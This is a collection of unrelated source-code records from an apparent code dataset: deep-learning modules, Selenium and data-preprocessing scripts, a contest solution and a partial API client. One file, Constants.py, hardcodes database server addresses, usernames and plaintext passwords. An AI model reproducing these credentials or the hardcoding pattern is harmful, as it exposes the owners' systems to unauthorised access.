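The clone_graph_nodes behaviour tested above is what lets a functional Model be built directly from an intermediate tensor; a sketch in plain Keras, assuming a version that ships this feature:

from keras import Input, layers, models

inputs = Input(shape=(8,))
x = layers.Dense(32)(inputs)   # intermediate tensor
y = layers.Dense(16)(x)

# The sub-graph between x and y is cloned into a standalone model
submodel = models.Model(x, y)
submodel.summary()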
+{"seq_id":"6441221","text":"import torch\nfrom torch import relu\nimport torch.nn as nn\n\n\nclass PixelShuffleUpsample(nn.Module):\n \"Upsample by `scale` from `ni` filters to `nf` (default `ni`), using `nn.PixelShuffle`, `icnr` init, and `weight_norm`.\"\n\n def __init__(self, in_channels: int, scale: int = 2, blur: bool = False):\n super().__init__()\n self.conv = nn.Conv2d(in_channels=in_channels,\n out_channels=4 * in_channels,\n kernel_size=(3, 3),\n stride=1,\n padding=(1, 1))\n self.pixel_shuffle = nn.PixelShuffle(scale)\n # Blurring over (h*w) kernel\n # \"Super-Resolution using Convolutional Neural Networks without Any Checkerboard Artifacts\"\n # - https://arxiv.org/abs/1806.02658\n self.blur = blur\n self.pad = nn.ReplicationPad2d((1, 0, 1, 0))\n self.avg_pool = nn.AvgPool2d(2, stride=1)\n\n def forward(self, x):\n x = self.conv(x)\n x = relu(x)\n x = self.pixel_shuffle(x)\n if self.blur:\n x = self.pad(x)\n x = self.avg_pool(x)\n return x\n\n\nif __name__ == '__main__':\n x = torch.rand((1, 128, 64, 64))\n print(x.shape)\n\n upsampler = PixelShuffleUpsample(in_channels=128, blur=True)\n print(upsampler(x).shape)\n","sub_path":"segmentation_models_pytorch/unet_plus/pixle_shuffle.py","file_name":"pixle_shuffle.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"626390062","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nclass By_class():\n def test_by(self):\n driver=webdriver.Firefox()\n print(\"Firefox opened successfully\")\n driver.maximize_window()\n url=\"https://letskodeit.teachable.com/pages/practice\"\n print(\"redirecting to\", url)\n driver.get(url)\n driver.maximize_window()\n by_id=driver.find_element(By.ID,\"name\")\n if by_id is not None:\n print(\"by_id found\")\n by_name=driver.find_element(By.NAME,\"show-hide\")\n if by_name is not None:\n print(\"by_name is found\")\n by_link_text=driver.find_element(By.LINK_TEXT,\"Login\")\n if by_link_text is not None:\n print(\"by_link_name is found\")\n by_partial_link_text=driver.find_element(By.PARTIAL_LINK_TEXT,\"Pract\")\n if by_partial_link_text is not None:\n print(\"by_partial_link_name is found\")\n by_xpath = driver.find_element(By.XPATH,\"//input[@id='name']\")\n if by_xpath is not None:\n print(\"xpath Found\")\n by_css = driver.find_element(By.CSS_SELECTOR,\"#displayed-text\")\n if by_css is not None:\n print(\"css_selector found\")\n by_class_name = driver.find_element(By.CLASS_NAME,\"displayed-class\")\n if by_class_name is not None:\n print(\"class_name Found\")\n by_tag_name = driver.find_element(By.TAG_NAME,\"h1\")\n if by_tag_name is not None:\n print(\"tag_name found\")\nb=By_class()\nb.test_by()\nprint(\"Code executed successfully\")","sub_path":"python-with-selenium/Selenium_concepts/webdriver/findBy_class.py","file_name":"findBy_class.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"235443690","text":"import csv\nfrom funcs import remove_space, remove_comma\nimport pandas as pd\n\n## 메뉴판 닷컴 전처리\ndef menupan_preprocessing(file_name):\n # file = 'menupan.csv'\n f = open('./' + file_name, 'r', encoding='utf-8-sig')\n f2 = open('menupan2.csv', 'w')\n contents = csv.reader(f) # 파일 읽기\n count = 0\n\n f2.write('식당이름' + ',' + '음식분류' + ',' + '주소' + ',' + 'URL' + ',' + '총평점' + ',' \n + '식당특징' + ',' + '영업시간' + ',' + '좌석개수' + ',' + '흡연여부' + ',' + '인터넷유무' + ',' \n + '주차유무' + ',' + '식당설명' + ',' + '리뷰' + ',' + '작성날짜' + ',' + '개별평점' + '\\n')\n for line in contents: # 파일 한 줄(행, row)씩 읽기\n count += 1\n if count == 1:\n continue\n date_data = line[13].split('\\n')\n score_data = line[14].split('\\n')\n reviews = line[12].split('@@\\n')\n for i in range(12):\n line[i] = remove_comma(line[i])\n\n for i in range(len(date_data)):\n reviews[i] = remove_comma(reviews[i])\n f2.write(line[0] + ',' + line[1] + ',' + line[2] + ',' + line[3] + ',' + line[4] + ',' \n + line[5] + ',' + line[6] + ',' + line[7] + ',' + line[8] + ',' + line[9] + ',' \n + line[10] + ',' + line[11] + ',' + reviews[i] + ',' + date_data[i] + ',' + score_data[i] + '\\n')\n\n f2.close()\n f.close()\n\n\n# 메뉴판닷컴 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef menupan_data_extraction(file_name):\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n\n df.drop(drop_columns, axis='columns', inplace=True)\n return df\n\n\n# 다이닝코드 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef diningcode_date_extraction(file_name):\n # file = './review_final.csv'\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n return df\n\n\n# 트립어드바이저 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef tripadvisor_date_extraction(file_name):\n # file = './review_final.csv'\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰'] # 이 부분 수정 필요\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n #df = df[['Restaurant', 'Address', 'Review']] # 컬럼 순서 정렬\n #df = df.rename(columns={'Restaurant':'식당이름', 'Address':'주소', 'Review':'리뷰'}) # 컬럼 이름 변경\n return df\n\n\n# 망고플레이트 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef mangoplate_data_extraction(file_name):\n df = pd.read_csv('./' + file_name)\n df = df.rename(columns={'RES_NAME':'식당이름', 'RES_ADDRESS':'주소', 'REV_COMMENT':'리뷰'}) # 컬럼 이름 변경\n drop_columns = []\n remain_columns = ['식당이름', '주소', '리뷰']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n df = df[['식당이름', '주소', '리뷰']] # 컬럼 순서 정렬\n return df\n\n\n# 요기요 데이터 추출(식당이름, 주소, 리뷰추출, 데이터들을 dataframe 형태로 반환)\ndef yogiyo_data_extraction(file_name):\n df = pd.read_csv('./' + file_name)\n drop_columns = []\n remain_columns = ['Restaurant', 'Address', 'Review']\n for c in df.columns:\n if c not in remain_columns:\n drop_columns.append(c)\n \n df.drop(drop_columns, axis='columns', inplace=True)\n df = df[['Restaurant', 'Address', 'Review']] # 컬럼 순서 정렬\n df = df.rename(columns={'Restaurant':'식당이름', 'Address':'주소', 'Review':'리뷰'}) # 컬럼 이름 변경\n return df\n\n\n# 데이터 추출의 메인함수\ndef data_extraction(file_list, main_file):\n result = pd.read_csv('./' + 
main_file)\n    df = pd.DataFrame() # file_list = [[name, type], []]\n    for f, site_type in file_list:\n        if site_type == 'yogiyo':\n            df = yogiyo_data_extraction(f)\n        elif site_type == 'mangoplate':\n            df = mangoplate_data_extraction(f)\n        elif site_type == 'tripadvisor':\n            df = tripadvisor_date_extraction(f)\n        elif site_type == 'diningcode':\n            df = diningcode_date_extraction(f)\n        elif site_type == 'menupan':\n            df = menupan_data_extraction(f)\n        result = pd.concat([result, df])\n    \n    result.to_csv('total_review.csv')\n    merge_same_restaurant('total_review.csv')\n\n\n# Merge the review data of rows that belong to the same restaurant\ndef merge_same_restaurant(file_name):\n    df = pd.read_csv('./' + file_name)\n    restaurants = df['식당이름'].unique()\n    new_df = pd.DataFrame(columns=['식당이름', '주소', '리뷰'])\n    for j, r in enumerate(restaurants):\n        restaurant = df[df['식당이름'] == r] # select the rows whose restaurant name matches\n        reviews = []\n        address = restaurant.iloc[0, 2]\n        for i in range(len(restaurant)):\n            review = restaurant.iloc[i, 3]\n            reviews.append(review)\n        new_df.loc[j] = [r, address, reviews]\n\n    new_df.to_csv('merge_review.csv')\n\n\n\n\n\ndf = pd.read_csv('./data/review_final2.csv')\nrestaurants = df['식당이름'].unique()\nnew_df = pd.DataFrame(columns=['식당이름','주소','리뷰'])\nfor j, r in enumerate(restaurants):\n    restaurant = df[df['식당이름'] == r] # select the rows whose restaurant name matches\n    reviews = []\n    address = restaurant.iloc[0, 2]\n    for i in range(len(restaurant)):\n        review = restaurant.iloc[i, 3]\n        reviews.append(review)\n    new_df.loc[j] = {'식당이름': r, '주소': address, '리뷰': reviews}\n\nnew_df.to_csv('merge_review.csv')\n","sub_path":"preprocessing/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
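The row-by-row loop in merge_same_restaurant can also be written as a single groupby; a sketch that is equivalent under the assumption that the address is constant for a given restaurant name (the input path matches the intermediate file written by data_extraction above):

import pandas as pd

df = pd.read_csv('./total_review.csv')

merged = (df.groupby('식당이름', as_index=False)
            .agg({'주소': 'first', '리뷰': list}))   # one row per restaurant, reviews collected into a list
merged.to_csv('merge_review.csv', index=False)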
+{"seq_id":"595821065","text":"#!/usr/bin/env python\n# if not N x N will pad\nfrom __future__ import print_function\nimport argparse\nimport csv\nimport os\nimport numpy as np\nfrom cic_dis import cic_utils\nfrom cic_dis import cic_ms\nfrom cic_dis import cic_plot\nimport sys\n\ncsv.field_size_limit(sys.maxsize) # let's rock\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Characterize repeated runs \"\n \"of community structure recorded in CSV\")\n parser.add_argument('-i', '--input_csv',\n help='Input, CSV containing multiple runs of '\n 'modularity detection', required=True)\n parser.add_argument('-H', '--header',\n help='Include header info, typically used first write',\n action='store_true')\n parser.add_argument('-isl', '--inj_site_lst',\n help='Injection sites present in matrix',\n required=True,\n nargs=\"+\")\n parser.add_argument('-v', '--verbose',\n help='Print relevant but optional output',\n action='store_true')\n\n args = vars(parser.parse_args())\n\n input_csv_path = args['input_csv']\n assert os.path.isfile(input_csv_path),\\\n \"can't find input csv file {}\".format(input_csv_path)\n display_header = args['header']\n verbose = args['verbose']\n inj_site_lst = args['inj_site_lst']\n\n # parse input csv into louvain run arr dict, all values are strings\n # [ { 'run' : run\n # 'num_communities' : num_communities\n # 'q' : q,\n # 'gamma' : gamma # redundant but that's better than the alternative\n # 'community_structure' : community_structure_dict string}, ... ]\n\n if verbose:\n print(\"Reading Louvain output CSV\")\n import time\n start = time.time()\n louvain_run_arr_dict = cic_utils.read_louvain_run_arr_dict(input_csv_path)\n\n if verbose:\n print(\"done in {}s\".format(time.time()-start))\n\n if verbose:\n print(\"Converting format of read louvain run arr dict\")\n import time\n start = time.time()\n\n num_com_npa = np.array(\n [x['num_communities'] for x in louvain_run_arr_dict])\n q_npa = np.array([x['q'] for x in louvain_run_arr_dict])\n\n # make set of sets from each community_structure and tally count of each\n com_cnt_dict = {} # { community_structure_set_of_sets : count }\n cmt_str_lst_fs_fs = [] # community structure list, list\n roi_name_lst = []\n for run in louvain_run_arr_dict:\n if len(roi_name_lst) == 0:\n roi_name_lst = sorted(\n cic_utils.flatten(run['community_structure'].values()))\n\n cmt_str_lst = run['community_structure'].values()\n cmt_str_lst_fs_fs.append(cic_ms.lst_lst_to_fs_fs(cmt_str_lst))\n set_of_sets = frozenset([frozenset(x) for x in cmt_str_lst])\n cnt = com_cnt_dict.get(set_of_sets, 0)\n com_cnt_dict[set_of_sets] = cnt + 1\n\n if verbose:\n print(\"done in {}s\".format(time.time()-start))\n\n # calculate a bunch of metrics\n num_runs = len(louvain_run_arr_dict)\n q_max = np.max(q_npa)\n unique_cmt_str = len(com_cnt_dict.keys())\n cmt_str_cnt_npa = np.array([x for x in com_cnt_dict.values()])\n cmt_str_mode_count = np.max(cmt_str_cnt_npa)\n # multi-scale stuff\n res_dct = {}\n if verbose:\n print(\"calculating std_dev_w_alpha_beta...\")\n start = time.time()\n std_dev_w_alpha_beta = cic_ms.calc_std_w_alpha_beta(\n roi_name_lst=roi_name_lst, cmt_str_lst_fs_fs=cmt_str_lst_fs_fs,\n res_dct=res_dct)\n if verbose:\n print(\"done in {}s: {}\".format(\n time.time()-start,\n std_dev_w_alpha_beta)\n )\n\n if verbose:\n print(\"calculating mean_var_z_alpha_beta...\")\n start = time.time()\n mean_var = cic_ms.calc_mean_var_z_alpha_beta(\n roi_name_lst=roi_name_lst,\n std_w_alpha_beta=std_dev_w_alpha_beta,\n 
cmt_str_lst_fs_fs=cmt_str_lst_fs_fs,\n M=cic_ms.n_choose_2(len(cmt_str_lst_fs_fs)),\n res_dct=res_dct)\n if verbose:\n print(\"done in {}s: {}\".format(\n time.time()-start,\n mean_var)\n )\n\n qmax_cmt_str = []\n for run in louvain_run_arr_dict:\n if len(qmax_cmt_str) == 0 and run['q'] == q_max:\n qmax_cmt_str = sorted(run['community_structure'].values())\n\n # okay phew! now calculate consensus community structure\n if verbose:\n print(\"calculating cons_cmt_str...\")\n start = time.time()\n if std_dev_w_alpha_beta == 0 or mean_var == float('Inf'):\n if verbose:\n print(\"No st.dev, returning arbitrary cmt str as consensus\")\n cons_cmt_str = next(iter(cmt_str_lst_fs_fs))\n else:\n cons_cmt_str = cic_ms.calc_cons_cmt_str(\n roi_name_lst=roi_name_lst,\n cmt_str_lst_fs_fs=cmt_str_lst_fs_fs,\n gamma=louvain_run_arr_dict[0]['gamma'],\n runs=num_runs,\n tau=0.1)\n if verbose:\n print(\"done in {}s\".format(time.time()-start))\n\n assert len(louvain_run_arr_dict) > 0 # reasonable assumption i hope\n\n # create print dict to be written to csv as single row\n # note no cmt structure included due to size limitations\n print_dict = {}\n print_dict[(0, 'num runs')] = num_runs\n print_dict[(0.5, 'gamma')] = louvain_run_arr_dict[0]['gamma']\n print_dict[(0.6, 'mean part sim')] = mean_var[0]\n print_dict[(0.7, 'var part sim')] = mean_var[1]\n print_dict[(0.8, 'len con cmt str')] = len(cons_cmt_str)\n print_dict[(1, 'max num com')] = np.max(num_com_npa)\n print_dict[(2, 'mean num com')] = np.mean(num_com_npa)\n print_dict[(3, 'std dev num com')] = np.std(num_com_npa)\n print_dict[(4, 'max q')] = q_max\n print_dict[(5, 'mean q')] = np.mean(q_npa)\n print_dict[(6, 'std dev')] = np.std(q_npa)\n print_dict[(7, 'unique cmt str')] = \"{}/{}\".format(\n unique_cmt_str,\n num_runs)\n print_dict[(8, 'cmt str mode count')] = \"{}/{}\".\\\n format(cmt_str_mode_count.tolist(), num_runs)\n\n # write to std out in csv file format\n csvwriter = csv.writer(sys.stdout)\n\n if display_header:\n row = []\n for key in sorted(print_dict.keys()):\n row.append(key[1])\n csvwriter.writerow(row)\n\n row = []\n for key in sorted(print_dict.keys()):\n row.append(print_dict[key])\n csvwriter.writerow(row)\n\n # now write community structure values\n row = []\n row.append('consensus cmt str:')\n # convert to lst_lst to save space in csv\n cons_cmt_str_lst_lst = cic_ms.fs_fs_to_lst_lst(cons_cmt_str)\n row.append(cons_cmt_str_lst_lst)\n csvwriter.writerow(row)\n row = []\n row.append('consensus cmt inj sites:')\n cmt_inj_sites = cic_plot.cmt_inj_site_lst_from_cons_cmt_str(\n inj_site_lst,\n cons_cmt_str_lst_lst)\n row.append(cmt_inj_sites)\n csvwriter.writerow(row)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/char_cmt_str.py","file_name":"char_cmt_str.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
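The tallying idiom used in the script above, a frozenset of frozensets as the dictionary key so that identical partitions hash together regardless of ordering, works the same in isolation:

partitions = [
    [['a', 'b'], ['c']],
    [['c'], ['b', 'a']],   # the same partition, listed in a different order
    [['a'], ['b', 'c']],
]

counts = {}
for p in partitions:
    key = frozenset(frozenset(cmt) for cmt in p)  # order-insensitive and hashable
    counts[key] = counts.get(key, 0) + 1

assert max(counts.values()) == 2  # the first two runs found the same structure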
+{"seq_id":"100952673","text":"t = int(input())\nfor _ in range(t):\n\tn = int(input())\n\tc = list(map(int,input().split()))\n\tidx = 0\n\tf = 0\n\tf2 = 0\n\tfor i in range(n):\n\t\tif(c[i]==1):\n\t\t\tidx = i\n\t\t\tbreak\n\n\tfor i in range(n):\n\t\tif(c[(idx+i)%n]!=i+1):\n\t\t\tf = 1\n\t\tif(c[idx-i]!=i+1):\n\t\t\tf2 = 1\n\tif f == 1 and f2 ==1:\n\t\tprint('NO')\n\telse:\n\t\tprint('YES')","sub_path":"codeforces/1203/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"353829059","text":"#!/usr/bin/env python\n\"\"\"cem_agent_env.py: testing cem agent.\n\"\"\"\n\n__author__ = \"Vinicius Guimaraes Goecks\"\n__copyright__ = \"TBD\"\n__credits__ = [\"TBD\", \"TBD\"]\n__license__ = \"TBD\"\n__version__ = \"0.0.0\"\n__maintainer__ = \"Vinicius Guimaraes Goecks\"\n__email__ = \"viniciusguigo@gmail.com\"\n__status__ = \"Prototype\"\n__date__ = \"September 25, 2016\"\n\n# import\nfrom cem_agent import ContinuousCEM, DiscreteCEM\nimport gym\nimport numpy as np\nfrom rotation_1dof import Rotation_1DOF_Env\n\n# initial and goal states\ninitial_state = np.array([0.,0.])\ngoal_state = np.array([.1,.1])\n\n# create env\n# env = gym.make(\"CartPole-v0\")\nenv = Rotation_1DOF_Env(initial_state, goal_state)\nenv.seed(0)\nnp.random.seed(0)\n\n# simulation parameters\nnum_episodes = 10\n\n# agent\nparams = dict(num_steps = 200, n_iter=20, batch_size=25, elite_frac = 0.2)\nagent = ContinuousCEM(env, **params)\n# agent = DiscreteCEM(env, **params)\nagent.fit() # train agent using batch rollouts\n\n# run episodes\nfor i in range(num_episodes):\n total_rew = 0\n ob = env.reset()\n\n # each step on episode\n for t in range(agent.num_steps):\n a = agent.act(ob)\n (ob, reward, done, _info) = env.step(a)\n total_rew += reward\n if done: break\n\n print('Episode %i, total_rew %f' %(i, total_rew))\n","sub_path":"test/test_cem/cem_agent_env.py","file_name":"cem_agent_env.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"190484678","text":"__author__ = 'htan'\n\nFORMAT = '%(asctime)-15s %(clientip)s %(user)-8s %(message)s'\nNum_Threads = 20\n\ndoclistfolder = \"D:/SECFiling/alldoclist/\"\n# docidlist =\"D:/SECFiling/8K/doclist.txt\"\ntenk_folder = \"D:/SECFiling/10K/raw\"\ntenk_text_folder = \"D:/SECFiling/10K/text\"\neightk_folder = \"D:/SECFiling/8K/raw/\"\ntenq_folder = \"D:/SECFiling/10Q/raw\"\ntenq_text_folder = \"D:/SECFiling/10Q/text\"\ntrscpt_folder = \"D:/SECFiling/transcripts/raw\"\ntrscpt_text_folder = \"D:/SECFiling/transcripts/text\"\ntrscpt_question_folder = \"D:/SECFiling/transcripts/questions\"\n# eightk_folder=\"C:/Users/htan/Desktop/badfiles/too empty/\"\ntest_size = 200\nInit8KItmes = \"data/8k items.txt\"\n#real SECDB server\n# sec_server = \"statestreet.cskg33esobcp.us-east-1.rds.amazonaws.com\"\n# sec_database = \"EDGAR2\"\n\n#testing SECDB server\nsec_server = \"34.206.10.85\"\nsec_database = \"EDGAR\"\nsec_uid = \"chicago\"\nsec_pwd = \"block37!\"\n\n\n\ndnn_server = \"dnndb02.cqciftmvisgw.us-west-2.rds.amazonaws.com\"\ndnn_database = \"DNN\"\ndnn_uid = \"admin\"\ndnn_pwd = \"520SState\"\n\ndbsource = \"dnn\"\n\n","sub_path":"Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"302990383","text":"#\n# datafiles\n#\n# References to the Chinese data files, including load/save functions\n# for char_dat.pkl.\n#\n\nimport os\nimport pickle\n\ndatapath = os.path.join(os.path.dirname(__file__), \"Datafiles\")\n\n\nSortDB = os.path.join(datapath, \"ch2sort.txt\")\nDictDB = os.path.join(datapath, \"xhc4_words.txt\")\nSortPickle = os.path.join(datapath, \"char_dat.pkl\")\n\n\ndef loadSortData(fname=SortPickle):\n pkl=file(fname, 'r')\n SortData = pickle.load(pkl)\n pkl.close()\n return SortData\n\ndef saveSortData(SortData, fname=SortPickle):\n pkl=file(fname,'w')\n pickle.dump(SortData, pkl)\n pkl.close()\n\n","sub_path":"flextools-2.2.1/FlexTools/Modules/Chinese/Lib/datafiles.py","file_name":"datafiles.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"248982702","text":"#It was used the API from the site https://sunrise-sunset.org/api\n#APP para acceder a la API de las horas de salida y puesta del sol\n\nimport requests\n\n\nurl = 'https://api.sunrise-sunset.org/json'\nlat = 42.2405864\nlong = -8.7208822\n\npayload = {\"lat\" : lat, \"lng\" : long}\n\njson_data = requests.get(url, params=payload).json()\n#print(json_data.url)\n\nif json_data['status'] == 'OK':\n\n sunrise = json_data['results']['sunrise']\n sunset = json_data['results']['sunset']\n\n print()\n print(\"La latitud es \" + str(lat) + \" y la longitud es \" + str(long), end=\".\\n\")\n print(\"El sol sale a las \" + str(sunrise) + \" y se pone a las \" + str(sunset), end=\".\\n\")\n\nelse:\n print(\"La solicitud no pudo completarse.\")","sub_path":"Python Code Emerging Technologies Workshop/sunsetSunrise.py","file_name":"sunsetSunrise.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"169009100","text":"import os\nimport re\nimport sys\nimport datetime\n\nimport requests\n\nfrom matroid import error\n\nBASE_URL = 'https://www.matroid.com/api/v1'\nDEFAULT_GRANT_TYPE = 'client_credentials'\n\ndef api_call(default_error):\n \"\"\"setup and teardown decorator for API calls\"\"\"\n def decorator(func):\n def setup_and_teardown(self, *original_args, **original_kwargs):\n self.retrieve_token()\n\n response = func(self, *original_args, **original_kwargs)\n\n try:\n self.check_errors(response, default_error)\n except error.TokenExpirationError:\n self.retrieve_token(options={'request_from_server': True})\n return func(self, *original_args, **original_kwargs)\n else:\n return self.format_response(response)\n return setup_and_teardown\n return decorator\n\n\nclass MatroidAPI(object):\n def __init__(self, base_url=BASE_URL, client_id=None, client_secret=None, options={}):\n \"\"\"\n base_url: the API endpoint\n client_id: OAuth public API key\n client_secret: OAuth private API key\n options (dict):\n set json_format to False to return API results as strings instead of objects\n set print_output to True to print the API results to the screen in addition to returning them\n set access_token with your auth token e.g., 43174a480adebf5b8e2bf39c0dcb53f1, to preload the token instead of requesting it from the server\n \"\"\"\n\n if not client_id:\n client_id = os.environ.get('MATROID_CLIENT_ID', None)\n\n if not client_secret:\n client_secret = os.environ.get('MATROID_CLIENT_SECRET', None)\n\n if not client_id or not client_secret:\n raise error.AuthorizationError(\n message='Both client_id and client_secret parameters are required')\n\n self.client_id = client_id\n self.client_secret = client_secret\n self.base_url = base_url\n self.token = None\n self.grant_type = DEFAULT_GRANT_TYPE\n self.json_format = options.get('json_format', True)\n self.print_output = options.get('print_output', False)\n self.filereader = self.FileReader()\n\n token = options.get('access_token')\n\n if token:\n token_type = 'Bearer'\n # if the token's lifetime is shorter than this, the client will request a refresh automatically\n lifetime_in_seconds = 7 * 24 * 60 * 60\n self.token = self.Token(token_type, token, lifetime_in_seconds)\n\n self.endpoints = {\n 'token': (self.base_url + '/oauth/token', 'POST'),\n 'detectors': (self.base_url + '/detectors/search', 'GET'),\n 'create_detector': (self.base_url + '/detectors', 'POST'),\n 'classify_image': (self.base_url + '/detectors/:key/classify_image', 'POST'),\n 'classify_video': (self.base_url + '/detectors/:key/classify_video', 'POST'),\n 'get_video_results': (self.base_url + '/videos/:key', 'GET'),\n 'register_stream': (self.base_url + '/streams', 'POST'),\n 'monitor_stream': (self.base_url + '/streams/:stream_id/monitor/:detector_id', 'POST'),\n 'train_detector': (self.base_url + '/detectors/:key/finalize', 'POST'),\n 'detector_info': (self.base_url + '/detectors/:key', 'GET'),\n 'account_info': (self.base_url + '/account', 'GET')\n }\n\n @api_call(error.InvalidQueryError)\n def list_detectors(self, **query):\n \"\"\"Lists the available detectors\"\"\"\n (endpoint, method) = self.endpoints['detectors']\n try:\n headers = {'Authorization': self.token.authorization_header()}\n params = {x: str(query[x]).lower() for x in query}\n return requests.request(method, endpoint, **{'headers': headers, 'params': params})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def classify_image(self, 
detector_id, image_file=None, image_url=None, **options):\n \"\"\"\n Classify an image with a detector\n\n detector_id: a unique id for the detector\n image_file: path to local image file to classify\n image_url: internet URL for the image to classify\n \"\"\"\n\n MAX_LOCAL_IMAGE_SIZE = 50 * 1024 * 1024\n MAX_LOCAL_IMAGE_BATCH_SIZE = 50 * 1024 * 1024\n\n def batch_file_classify(image_file):\n try:\n files = []\n total_batch_size = 0\n for file in image_file:\n file_obj = self.filereader.get_file(file)\n file_size = os.fstat(file_obj.fileno()).st_size\n\n if file_size > MAX_LOCAL_IMAGE_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_obj.name, self.bytes_to_mb(MAX_LOCAL_IMAGE_BATCH_SIZE)))\n\n files.append(('file', file_obj))\n total_batch_size += file_size\n\n if total_batch_size > MAX_LOCAL_IMAGE_BATCH_SIZE:\n raise error.InvalidQueryError(message='Max batch upload size is %d megabytes.' % (self.bytes_to_mb(MAX_LOCAL_IMAGE_BATCH_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n finally:\n for file_tuple in files:\n (key, file) = file_tuple\n file.close()\n\n (endpoint, method) = self.endpoints['classify_image']\n\n if not image_url and not image_file:\n raise error.InvalidQueryError(\n message='Missing required parameter: image_file or image_url')\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {'detector_id': detector_id}\n data.update(options)\n\n if image_url:\n data['url'] = image_url\n if image_file:\n if isinstance(image_file, list):\n return batch_file_classify(image_file)\n else:\n with self.filereader.get_file(image_file) as file_to_upload:\n files = {'file': file_to_upload}\n file_size = os.fstat(file_to_upload.fileno()).st_size\n\n if file_size > MAX_LOCAL_IMAGE_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_to_upload.name, self.bytes_to_mb(MAX_LOCAL_IMAGE_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n else:\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except IOError as e:\n raise e\n except error.InvalidQueryError as e:\n raise e\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n def retrieve_token(self, options={}):\n \"\"\"\n Generates an OAuth token. The API client will intelligently refresh the Access Token for you\n However, if you would like to manually expire an existing token and create a new token,\n call this method manually and pass in 'expire_token': True in the options argument.\n\n In addition, you would have to refresh manually if another client has expired your access token.\n\n You can pass the 'request_from_server': True option to make a request\n to the server for the access token without invalidating it. 
This is useful if you are running\n multiple clients with the same token so they don't endlessly refresh each others' tokens\n \"\"\"\n\n (endpoint, method) = self.endpoints['token']\n\n if not options.get('expire_token') and not options.get('request_from_server'):\n if self.token and not self.token.expired():\n return self.token\n\n try:\n query_data = {'grant_type': self.grant_type,\n 'client_id': self.client_id, 'client_secret': self.client_secret}\n if options.get('expire_token'):\n query_data['refresh'] = 'true'\n response = requests.request(method, endpoint, data=query_data)\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n self.check_errors(response, error.AuthorizationError)\n\n self.save_token(response)\n\n @api_call(error.InvalidQueryError)\n def classify_video(self, detector_id, video_url=None, video_file=None):\n \"\"\"\n Classify a video from a url with a detector\n\n detector_id: a unique id for the detector\n video_url: internet URL for the video to classify\n \"\"\"\n\n MAX_LOCAL_VIDEO_SIZE = 300 * 1024 * 1024\n\n (endpoint, method) = self.endpoints['classify_video']\n\n if not video_url and not video_file:\n raise error.InvalidQueryError(\n message='Missing required parameter: video_url or video_file')\n\n if video_url and video_file:\n raise error.InvalidQueryError(\n message='Cannot classify a URL and local file in the same request')\n\n if isinstance(video_file, list):\n raise error.InvalidQueryError(\n message='Only one video can be uploaded at a time')\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {'detector_id': detector_id}\n if video_url:\n data['url'] = video_url\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n elif video_file:\n with self.filereader.get_file(video_file) as file_to_upload:\n files = {'file': file_to_upload}\n file_size = os.fstat(file_to_upload.fileno()).st_size\n\n if file_size > MAX_LOCAL_VIDEO_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_to_upload.name, self.bytes_to_mb(MAX_LOCAL_VIDEO_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n except error.InvalidQueryError as e:\n raise e\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n 